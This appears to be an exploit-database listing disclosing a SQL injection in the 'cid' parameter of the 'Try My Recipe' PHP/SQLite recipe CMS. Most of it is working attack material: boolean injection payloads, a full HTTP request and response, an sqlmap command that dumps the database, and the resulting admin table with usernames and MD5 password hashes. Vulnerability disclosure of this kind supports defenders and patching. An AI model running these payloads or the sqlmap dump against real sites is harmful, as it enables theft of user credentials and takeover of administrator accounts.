Exploit for Try My Recipe SQL Injection

Name: Exploit for Try My Recipe SQL Injection
Rating: 5 (201 reviews)
2021-10-05 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:164397
https://www.sourcecodester.com/php/14964/try-my-recipe-recipe-sharing-website-cms-php-and-sqlite-free-source-code.html  
  
## [CVE-nu11-17-092921](https://www.sourcecodester.com/php/14964/try-my-recipe-recipe-sharing-website-cms-php-and-sqlite-free-source-code.html)  
## [Vendor](https://www.sourcecodester.com/users/tips23)  
![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/CVE-nu11-17-092921/docs/view_recipe_content.png)  
  
## MySQL Vulnerability Description:  
The `cid` parameter appears on Recipe Sharing Website - CMS  
(by:oretnom23) to be vulnerable to SQL injection attacks. The payloads  
12345678' or '7775'='7775 and 77335599' or '5533'='5577 were each  
submitted in the `cid` parameter. These two requests resulted in  
different responses, indicating that the input is being incorporated  
into a SQL query in an unsafe way.  
The attacker can dump information about users and their passwords.  
Then he can take control of their accounts.  
  
- MySQL Request:  
  
```cmd  
GET /recipe_site/?page=recipe&cid=12345678'%20or%20'7775'%3d'7775 HTTP/1.1  
Host: 192.168.1.180  
Cookie: PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd  
Upgrade-Insecure-Requests: 1  
Referer: http://192.168.1.180/recipe_site/  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
```  
  
- MySQL Response:  
  
```cmd  
HTTP/1.1 200 OK  
Date: Wed, 29 Sep 2021 07:50:44 GMT  
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22  
X-Powered-By: PHP/7.4.22  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 13306  
  
<br />  
<b>Warning</b>: SQLite3::exec(): database is locked in  
<b>C:\xampp\htdocs\recipe_site\DBConnection.php</b> on line  
<b>76</b><br />  
<br />  
<b>Warning</b>: SQLite3::exec(): database is locked i  
...[SNIP]...  
<div class="item col wow bounceInUp">  
...[SNIP]...  
<div class="card shadow-sm ">  
...[SNIP]...  
<div class="card-body ">  
...[SNIP]...  
<h5 class="card-title mb-1">Sample Recipe 102</h5>  
...[SNIP]...  
<hr class="bg-primary opacity-100">  
...[SNIP]...  
<p class="truncate-3 fw-light fst-italic lh-1" title="Class aptent  
taciti sociosqu ad litora torquent per conubia nostra, per inceptos  
himenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur  
accumsan metus sit amet erat volutpat, pl  
...[SNIP]...  
<div class="w-100 d-flex justify-content-end">  
...[SNIP]...  
<div class="col-auto flex-grow-1">  
...[SNIP]...  
<div class="text-muted truncate-1" title="Claire Blake">  
...[SNIP]...  
<div class="col-auto">  
...[SNIP]...  
<a href="./?page=view_recipe&rid=2" class="btn btn-sm btn-primary  
bg-gradient rounded-0 py-0">View Recipes</a>  
...[SNIP]...  
<div class="item col wow bounceInUp">  
...[SNIP]...  
<div class="card shadow-sm ">  
...[SNIP]...  
<div class="card-body ">  
...[SNIP]...  
<h5 class="card-title mb-1">Sample Menu</h5>  
...[SNIP]...  
<hr class="bg-primary opacity-100">  
...[SNIP]...  
<p class="truncate-3 fw-light fst-italic lh-1" title="Lorem ipsum  
dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed  
porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus  
at odio. Proin elementum convallis leo at  
...[SNIP]...  
<div class="w-100 d-flex justify-content-end">  
...[SNIP]...  
<div class="col-auto flex-grow-1">  
...[SNIP]...  
<div class="text-muted truncate-1" title="Try My Recipe Mgt">  
...[SNIP]...  
<div class="col-auto">  
...[SNIP]...  
<a href="./?page=view_recipe&rid=1" class="btn btn-sm btn-primary  
bg-gradient rounded-0 py-0">View Recipes</a>  
...[SNIP]...  
```  
  
- The PoC:  
  
```cmd  
python sqlmap.py -u  
"http://192.168.1.180/recipe_site/?page=view_recipe&rid=2"  
--data="username=PWNED&password=password"  
--cookie="PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd" --batch  
--answers="crack=N,dict=N,continue=Y,quit=N" --dump  
```  
- Output from the PoC:  
  
- dump  
  
Table: admin_list  
[2 entries]  
+----------+------+--------+---------------+----------------------------------+-----------+---------------------+  
| admin_id | type | status | fullname | password  
| username | date_created |  
+----------+------+--------+---------------+----------------------------------+-----------+---------------------+  
| 1 | 1 | 1 | Administrator |  
0192023a7bbd73250516f069df18b500 | admin | 2021-09-28 01:54:24 |  
| 2 | 2 | 1 | Mike Williams |  
a88df23ac492e6e2782df6586a0c645f | mwilliams | 2021-09-28 08:00:51 |  
+----------+------+--------+---------------+----------------------------------+-----------+---------------------+  
  
# BR  
  
  
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://www.exploit-db.com/  
https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>